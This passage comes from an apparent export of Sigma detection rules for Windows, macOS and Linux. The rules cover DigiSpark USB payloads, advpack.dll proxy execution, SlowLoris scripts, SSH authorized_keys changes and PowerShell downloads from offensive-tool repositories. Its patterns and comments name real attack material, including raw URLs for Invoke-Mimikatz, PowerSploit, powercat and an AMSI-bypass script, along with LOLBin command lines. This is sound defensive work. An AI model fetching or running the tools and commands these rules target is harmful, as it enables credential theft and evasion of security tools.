"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073467Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redacted.au/creating-a-usb-rubber-ducky-from-a-digispark-attiny-85/",
"https://github.com/zer0overflow/DigiPwn",
"https://attack.mitre.org/techniques/T1091/",
"https://attack.mitre.org/techniques/T1200/"
],
"name": "t1200_popular_digispark_powershell_scripts.yml",
"content": "title: DigiSpark USB Malicious PowerShell Snippets\nid: d06f9bc2-420e-4291-93be-da3246c0dc81\ndescription: |\n Detects popular default PowerShell snippets deployed by DigiSpark, an alternative to USB hacking tools like RubberDucky or BashBunny.\n This detects snippets from different public repositories associated with DigiSpark. While some actions may not be from a DigiSpark device, they may still be malicious.\n It is recommended to investigate the PowerShell script and determine the context in which it was executed. It is also recommended to investigate any USB devices that were plugged in to this machine.\nreferences:\n - https://redacted.au/creating-a-usb-rubber-ducky-from-a-digispark-attiny-85/\n - https://github.com/zer0overflow/DigiPwn\n - https://attack.mitre.org/techniques/T1091/\n - https://attack.mitre.org/techniques/T1200/\ndate: 2025/01/06\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1200\n - attack.t1091\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.HackTool.DigiSpark\n - classification.Windows.Behavior.USB\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n PowershellCommand|contains:\n - 'Regards Your Digispark'\n - 'DigiSpark Report'\n - 'http://bit.ly/14bZZ0c'\n - 'Pwned from DigiSpark !'\n - 'https://vk.com/doc138418519_492631985'\n - '$code = {function My-Keypresses($Path='\n - 'Digi-WP-Mail'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d06f9bc2-420e-4291-93be-da3246c0dc81",
"rule_name": "DigiSpark USB Malicious PowerShell Snippets",
"rule_description": "Detects popular default PowerShell snippets deployed by DigiSpark, an alternative to USB hacking tools like RubberDucky or BashBunny.\nThis detects snippets from different public repositories associated with DigiSpark. While some actions may not be from a DigiSpark device, they may still be malicious.\nIt is recommended to investigate the PowerShell script and determine the context in which it was executed. It is also recommended to investigate any USB devices that were plugged in to this machine.\n",
"rule_creation_date": "2025-01-06",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1091",
"attack.t1200"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d0cfcf52-bb32-4c4d-a983-0bebd4b842a7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088275Z",
"creation_date": "2026-03-23T11:45:34.088277Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088281Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Libraries/Advpack/",
"https://attack.mitre.org/techniques/T1218/011/"
],
"name": "t1218_011_rundll32_advpack.yml",
"content": "title: Proxy Execution via Advpack.dll\nid: d0cfcf52-bb32-4c4d-a983-0bebd4b842a7\ndescription: |\n Detects a suspicious invocation of Advpack.dll by rundll32.\n Adversaries may abuse rundll32.exe to proxy execution of malicious code.\n Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor an execution of the rundll32.exe process because of whitelists or false positives from baseline behavior.\n It is recommended to investigate the legitimacy of the process responsible for the execution of rundll32 and to analyze child processes.\nreferences:\n - https://lolbas-project.github.io/lolbas/Libraries/Advpack/\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2022/12/02\nmodified: 2025/10/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.011\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Advpack\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\rundll32.exe'\n - OriginalFileName: 'RUNDLL32.EXE'\n\n selection_advpack:\n CommandLine|contains: ' advpack'\n\n # rundll32.exe advpack.dll,LaunchINFSection c:\\test.inf,,1,\n selection_action_launchinf:\n CommandLine|contains:\n - 'LaunchINFSection'\n - '#8' # LaunchINFSectionA\n - '#9' # LaunchINFSectionEx\n - '#10' # LaunchINFSectionExA\n - '#44' # LaunchINFSection\n - '#45' # LaunchINFSectionExW\n - '#46' # LaunchINFSectionW\n\n # rundll32.exe advpack.dll,RegisterOCX test.dll\n selection_action_registerocx:\n CommandLine|contains:\n - 'RegisterOCX'\n - '#11' # RegisterOCX\n - '#12' # RegisterOCXW\n\n exclusion_programfiles:\n CommandLine|contains:\n - 'rundll32.exe advpack.dll,LaunchINFSection ?:\\Program Files\\'\n - 'rundll32.exe advpack.dll,LaunchINFSection ?:\\Program Files (x86)\\'\n - 'rundll32.exe advpack.dll,LaunchINFSectionEx ?:\\Program Files\\'\n - 'rundll32.exe advpack.dll,LaunchINFSectionEx ?:\\Program Files (x86)\\'\n - 'rundll32 advpack.dll,LaunchINFSection ?:\\Program Files\\'\n - 'rundll32 advpack.dll,LaunchINFSection ?:\\Program Files (x86)\\'\n - 'rundll32 advpack.dll,LaunchINFSectionEx ?:\\Program Files\\'\n - 'rundll32 advpack.dll,LaunchINFSectionEx ?:\\Program Files (x86)\\'\n\n exclusion_ieuinit:\n CommandLine|contains: '?:\\Windows\\system32\\ieuinit.inf'\n\n exclusion_immersivecontrolpanel:\n CommandLine|startswith: '?:\\Windows\\System32\\rundll32.exe ADVPACK.DLL,LaunchINFSection '\n ParentImage: '?:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe'\n\n exclusion_windows_media:\n CommandLine|contains: 'rundll32.exe advpack.dll,LaunchINFSection setup.inf,,1,N'\n ParentImage: '?:\\ProgramData\\Package Cache\\\\*\\wm8eutil_setup.exe'\n\n exclusion_hp:\n ParentImage: '?:\\Program Files\\HPCommRecovery\\HPCommRecovery.exe'\n\n condition: selection_bin and selection_advpack and 1 of selection_action_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d0cfcf52-bb32-4c4d-a983-0bebd4b842a7",
"rule_name": "Proxy Execution via Advpack.dll",
"rule_description": "Detects a suspicious invocation of Advpack.dll by rundll32.\nAdversaries may abuse rundll32.exe to proxy execution of malicious code.\nUsing rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor an execution of the rundll32.exe process because of whitelists or false positives from baseline behavior.\nIt is recommended to investigate the legitimacy of the process responsible for the execution of rundll32 and to analyze child processes.\n",
"rule_creation_date": "2022-12-02",
"rule_modified_date": "2025-10-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d10ca8a8-d720-4cca-8cbd-e183bb381b37",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619635Z",
"creation_date": "2026-03-23T11:45:34.619637Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619641Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cloudflare.com/learning/ddos/ddos-attack-tools/slowloris/",
"https://github.com/maxkrivich/SlowLoris",
"https://github.com/StanGirard/SlowLoris-DDOS-Attack",
"https://github.com/0xc0d/Slow-Loris",
"https://github.com/GHubgenius/slowloris.pl",
"https://attack.mitre.org/techniques/T1499/002/"
],
"name": "t1498_slowloris_script_execution_macos.yml",
"content": "title: SlowLoris Script Execution (macOS)\nid: d10ca8a8-d720-4cca-8cbd-e183bb381b37\ndescription: |\n Detects suspicious arguments in a command-line linked to the usage of a SlowLoris DDoS script.\n SlowLoris is a type of DDoS attack that allows an attacker to overwhelm a server by maintaining multiple HTTP connections.\n It is recommended to investigate this by checking if the script parameters are aimed at your own infrastructure and that they're not part of an internal test.\nreferences:\n - https://www.cloudflare.com/learning/ddos/ddos-attack-tools/slowloris/\n - https://github.com/maxkrivich/SlowLoris\n - https://github.com/StanGirard/SlowLoris-DDOS-Attack\n - https://github.com/0xc0d/Slow-Loris\n - https://github.com/GHubgenius/slowloris.pl\n - https://attack.mitre.org/techniques/T1499/002/\ndate: 2023/09/19\nmodified: 2025/01/08\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1499.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.HackTool.SlowLoris\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n CommandLine|contains:\n - 'slowloris.pl'\n - 'slowloris '\n - 'slowloris.py'\n\n # There is another rule for cloning\n filter_github:\n CommandLine|contains:\n - ' clone '\n - 'github'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d10ca8a8-d720-4cca-8cbd-e183bb381b37",
"rule_name": "SlowLoris Script Execution (macOS)",
"rule_description": "Detects suspicious arguments in a command-line linked to the usage of a SlowLoris DDoS script.\nSlowLoris is a type of DDoS attack that allows an attacker to overwhelm a server by maintaining multiple HTTP connections.\nIt is recommended to investigate this by checking if the script parameters are aimed at your own infrastructure and that they're not part of an internal test.\n",
"rule_creation_date": "2023-09-19",
"rule_modified_date": "2025-01-08",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1499.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d12ad52c-e73b-4f36-9f17-cf34a7c5d3c0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.741647Z",
"creation_date": "2026-03-23T11:45:34.081367Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081371Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1021/004/",
"https://attack.mitre.org/techniques/T1484/",
"https://attack.mitre.org/techniques/T1098/004/"
],
"name": "t1021_004_ssh_authorized_keys_modified_linux.yml",
"content": "title: SSH Authorized Keys Modified\nid: d12ad52c-e73b-4f36-9f17-cf34a7c5d3c0\ndescription: |\n Detects an attempt to modify the content of ~/.ssh/authorized keys.\n This file contains the list of SSH keys that are allowed to connect to that account.\n Modifying this file can therefore be an attempt to facilitate lateral movement.\n It is recommended to correlate this alert with other initial access or malicious activity in the machine to determine its legitimacy\nreferences:\n - https://attack.mitre.org/techniques/T1021/004/\n - https://attack.mitre.org/techniques/T1484/\n - https://attack.mitre.org/techniques/T1098/004/\ndate: 2022/11/07\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.004\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1484\n - attack.persistence\n - attack.t1098.004\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.ConfigChange\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path:\n - '/home/*/.ssh/authorized_keys'\n - '/home/*/.ssh/authorized_keys2'\n - '/root/.ssh/authorized_keys'\n - '/root/.ssh/authorized_keys2'\n - TargetPath:\n - '/home/*/.ssh/authorized_keys'\n - '/home/*/.ssh/authorized_keys2'\n - '/root/.ssh/authorized_keys'\n - '/root/.ssh/authorized_keys2'\n\n filter_access_old:\n Kind: 'access'\n Permissions: 'read'\n\n filter_access_new:\n Kind:\n - 'read'\n - 'chmod'\n - 'chown'\n - 'remove'\n\n exclusion_ssh:\n - ProcessImage: '/usr/bin/ssh'\n - ProcessParentImage: '/usr/bin/ssh'\n\n exclusion_scp:\n - ProcessImage: '/usr/bin/scp'\n - ProcessParentImage: '/usr/bin/scp'\n\n exclusion_common:\n ProcessImage:\n - '/usr/sbin/luserdel'\n - '/usr/bin/touch'\n - '/usr/bin/git'\n - '/usr/bin/rsync'\n - '/usr/bin/tar'\n\n exclusion_commandline:\n ProcessCommandLine: '/bin/mv /tmp/file?????? /home/u*/.ssh/authorized_keys'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_docker:\n - ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/snap/docker/*/bin/dockerd'\n - ProcessAncestors|contains: '|/usr/bin/dockerd|'\n\n exclusion_podman:\n ProcessImage: '/usr/bin/podman'\n\n exclusion_containers:\n ProcessAncestors|contains:\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/var/lib/rancher/k3s/data/*/bin/containerd-shim-runc-v2|'\n\n exclusion_netwitness_logcollector:\n - ProcessCommandLine: '/bin/bash /etc/netwitness/ng/logcollector/lctwin'\n - ProcessParentCommandLine: '/bin/bash /etc/netwitness/ng/logcollector/lctwin'\n\n exclusion_puppet:\n - ProcessImage: '/opt/puppetlabs/puppet/bin/ruby'\n - ProcessParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n - ProcessGrandparentImage: '/opt/puppetlabs/puppet/bin/ruby'\n\n exclusion_google:\n ProcessImage: '/usr/bin/google_guest_agent'\n\n exclusion_opcon:\n - ProcessCommandLine: '/bin/sh /tmp/opcon_agent/bin/install_key /tmp/opcon_agent/bin/sma_id_rsa.pub'\n - ProcessParentCommandLine: '/bin/sh /tmp/opcon_agent/bin/install_key /tmp/opcon_agent/bin/sma_id_rsa.pub'\n\n exclusion_salt_minion:\n - ProcessCommandLine:\n - '/opt/saltstack/salt/bin/python3.?? /usr/bin/salt-minion'\n - '/usr/bin/python3 /usr/bin/salt-minion'\n - ProcessParentCommandLine:\n - '/opt/saltstack/salt/bin/python3.?? /usr/bin/salt-minion'\n - '/usr/bin/python3 /usr/bin/salt-minion'\n - ProcessGrandparentCommandLine:\n - '/opt/saltstack/salt/bin/python3.?? /usr/bin/salt-minion'\n - '/usr/bin/python3 /usr/bin/salt-minion'\n\n exclusion_rudder:\n - ProcessCommandLine:\n - '/bin/sh /opt/rudder/share/commands/agent-run -urn'\n - '/opt/rudder/bin/cf-agent -i -d info -cnever -k'\n - ProcessParentCommandLine:\n - '/bin/sh /opt/rudder/share/commands/agent-run -urn'\n - '/opt/rudder/bin/cf-agent -i -d info -cnever -k'\n\n exclusion_buildah:\n ProcessParentCommandLine: 'buildah-oci-runtime'\n ProcessGrandparentCommandLine: 'buildah-oci-runtime'\n\n exclusion_docker_chown:\n ProcessCommandLine: 'chown docker:docker /home/docker/.ssh/authorized_keys'\n\n exclusion_legitimate_sshd_check:\n ProcessCommandLine|startswith: 'sh -c cd ; umask 077 ; mkdir -p .ssh && { [ -z `tail -1c .ssh/authorized_keys 2>/dev/null` ] || echo >> .ssh/authorized_keys || exit 1; } && cat >> .ssh/authorized_keys || exit 1 ;'\n ProcessGrandparentImage: '/usr/sbin/sshd'\n\n exclusion_openwrt:\n ProcessCommandLine|startswith: 'sh -c cd; umask 077; AUTH_KEY_FILE=\".ssh/authorized_keys\"; [ -f /etc/openwrt_release ] && [ \"$LOGNAME\" = \"root\" ] && AUTH_KEY_FILE=/etc/dropbear/authorized_keys; AUTH_KEY_DIR=`dirname \"${AUTH_KEY_FILE}\"`;'\n ProcessGrandparentImage: '/usr/sbin/sshd'\n\n exclusion_rename:\n Kind: 'rename'\n ProcessImage:\n - '/usr/bin/vi'\n - '/usr/bin/vim'\n - '/usr/bin/vim.basic'\n - '/usr/bin/emacs-gtk'\n TargetPath: '/*/.ssh/authorized_keys~'\n\n exclusion_temp_file:\n - ProcessImage: '/usr/bin/sed'\n Path: '/*/.ssh/sed??????'\n - ProcessImage: '/usr/bin/sed'\n TargetPath: '/*/.ssh/sed??????'\n\n exclusion_cron:\n ProcessAncestors|contains: '|/usr/sbin/incrond|'\n\n exclusion_octelium:\n ProcessImage: '/usr/local/bin/octelium'\n ProcessCommandLine|contains: 'octelium connect -p '\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d12ad52c-e73b-4f36-9f17-cf34a7c5d3c0",
"rule_name": "SSH Authorized Keys Modified",
"rule_description": "Detects an attempt to modify the content of ~/.ssh/authorized keys.\nThis file contains the list of SSH keys that are allowed to connect to that account.\nModifying this file can therefore be an attempt to facilitate lateral movement.\nIt is recommended to correlate this alert with other initial access or malicious activity in the machine to determine its legitimacy\n",
"rule_creation_date": "2022-11-07",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.lateral_movement",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1021.004",
"attack.t1098.004",
"attack.t1484"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d242d0d4-fb07-43c1-8f33-f08f9c952b6f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091817Z",
"creation_date": "2026-03-23T11:45:34.091819Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091823Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_powershell_malicious_urls_cmd.yml",
"content": "title: URLs of Malicious Code Repository in PowerShell Command-line\nid: d242d0d4-fb07-43c1-8f33-f08f9c952b6f\ndescription: |\n Detects PowerShell commandlets containing a URL that references repositories used to host malicious code or offensive tooling.\n Threat actors frequently use public repositories and open-source PowerShell scripts in their attacks.\n It is recommended to investigate the repository being accessed, and examine any files or data that may have been downloaded. If your organization is not undergoing a security audit, this could indicate the initial stages of an attack.\nreferences:\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2020/12/08\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.NetworkActivity\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_powershell:\n - Image|endswith: '\\powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n\n selection_github:\n CommandLine|contains:\n - '/raw.githubusercontent.com/'\n - 'LwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8A'\n - '8AcgBhAHcALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvA'\n - 'vAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALw'\n - '/gist.githubusercontent.com/'\n - 'LwBnAGkAcwB0AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALw'\n - '8AZwBpAHMAdAAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8A'\n - 'vAGcAaQBzAHQALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvA'\n\n selection_repo:\n CommandLine|contains:\n # https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/Find-Fruit.ps1\n # https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1\n - '/S3cur3Th1sSh1t/'\n # /S3cur3Th1sSh1t/ in UTF16-LE in base64 with 3 different offsets, for PowerShell command-lines\n - 'LwBTADMAYwB1AHIAMwBUAGgAMQBzAFMAaAAxAHQALw'\n - '8AUwAzAGMAdQByADMAVABoADEAcwBTAGgAMQB0AC8A'\n - 'vAFMAMwBjAHUAcgAzAFQAaAAxAHMAUwBoADEAdAAvA'\n # 'https://raw.githubusercontent.com/pwnieexpress/Metasploit-framework/master/exploits/powershell/powerdump.ps1\n - '/pwnieexpress/'\n - 'LwBwAHcAbgBpAGUAZQB4AHAAcgBlAHMAcwAvA'\n - '8AcAB3AG4AaQBlAGUAeABwAHIAZQBzAHMALw'\n - 'vAHAAdwBuAGkAZQBlAHgAcAByAGUAcwBzAC8A'\n # https://raw.githubusercontent.com/EmpireProject/Empire/master/module_source/credentials/Invoke-Mimikatz.ps1\n - '/EmpireProject/'\n - 'LwBFAG0AcABpAHIAZQBQAHIAbwBqAGUAYwB0AC8A'\n - '8ARQBtAHAAaQByAGUAUAByAG8AagBlAGMAdAAvA'\n - 'vAEUAbQBwAGkAcgBlAFAAcgBvAGoAZQBjAHQALw'\n # https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1\n - '/PowerSploit/'\n - 'LwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALw'\n - '8AUABvAHcAZQByAFMAcABsAG8AaQB0AC8A'\n - 'vAFAAbwB3AGUAcgBTAHAAbABvAGkAdAAvA'\n # https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1\n - '/clymb3r/'\n - 'LwBjAGwAeQBtAGIAMwByAC8A'\n - '8AYwBsAHkAbQBiADMAcgAvA'\n - 'vAGMAbAB5AG0AYgAzAHIALw'\n - '/Invoke-Mimikatz/'\n - 'LwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAvA'\n - '8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALw'\n - 'vAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6AC8A'\n # https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1\n - '/BloodHoundAD/'\n - 'LwBCAGwAbwBvAGQASABvAHUAbgBkAEEARAAvA'\n - '8AQgBsAG8AbwBkAEgAbwB1AG4AZABBAEQALw'\n - 'vAEIAbABvAG8AZABIAG8AdQBuAGQAQQBEAC8A'\n # https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1\n - '/Kevin-Robertson/'\n - 'LwBLAGUAdgBpAG4ALQBSAG8AYgBlAHIAdABzAG8AbgAvA'\n - '8ASwBlAHYAaQBuAC0AUgBvAGIAZQByAHQAcwBvAG4ALw'\n - 'vAEsAZQB2AGkAbgAtAFIAbwBiAGUAcgB0AHMAbwBuAC8A'\n # https://raw.githubusercontent.com/Veil-Framework/Veil-Pillage/master/data/PowerSploit/Invoke-Mimikatz.ps1\n - '/Veil-Framework/'\n - 'LwBWAGUAaQBsAC0ARgByAGEAbQBlAHcAbwByAGsALw'\n - '8AVgBlAGkAbAAtAEYAcgBhAG0AZQB3AG8AcgBrAC8A'\n - 'vAFYAZQBpAGwALQBGAHIAYQBtAGUAdwBvAHIAawAvA'\n # https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/Get-SPN/Get-SPN.psm1\n - '/nullbind/Powershellery/'\n - 'LwBuAHUAbABsAGIAaQBuAGQALwBQAG8AdwBlAHIAcwBoAGUAbABsAGUAcgB5AC8A'\n - '8AbgB1AGwAbABiAGkAbgBkAC8AUABvAHcAZQByAHMAaABlAGwAbABlAHIAeQAvA'\n - 'vAG4AdQBsAGwAYgBpAG4AZAAvAFAAbwB3AGUAcgBzAGgAZQBsAGwAZQByAHkALw'\n # https://gist.githubusercontent.com/shantanu561993/6483e524dc225a188de04465c8512909/raw/db219421ea911b820e9a484754f03a26fbfb9c27/AMSI_bypass_Reflection.ps1\n - '/shantanu561993/'\n - 'LwBzAGgAYQBuAHQAYQBuAHUANQA2ADEAOQA5ADMALw'\n - '8AcwBoAGEAbgB0AGEAbgB1ADUANgAxADkAOQAzAC8A'\n - 'vAHMAaABhAG4AdABhAG4AdQA1ADYAMQA5ADkAMwAvA'\n # https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1\n - '/powercat/'\n - 'LwBwAG8AdwBlAHIAYwBhAHQALw'\n - '8AcABvAHcAZQByAGMAYQB0AC8A'\n - 'vAHAAbwB3AGUAcgBjAGEAdAAvA'\n # https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/master/Start-Eidolon.ps1\n - '/FuzzySecurity/PowerShell-Suite/'\n - 'LwBGAHUAegB6AHkAUwBlAGMAdQByAGkAdAB5AC8AUABvAHcAZQByAFMAaABlAGwAbAAtAFMAdQBpAHQAZQAvA'\n - '8ARgB1AHoAegB5AFMAZQBjAHUAcgBpAHQAeQAvAFAAbwB3AGUAcgBTAGgAZQBsAGwALQBTAHUAaQB0AGUALw'\n - 'vAEYAdQB6AHoAeQBTAGUAYwB1AHIAaQB0AHkALwBQAG8AdwBlAHIAUwBoAGUAbABsAC0AUwB1AGkAdABlAC8A'\n # https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1\n - 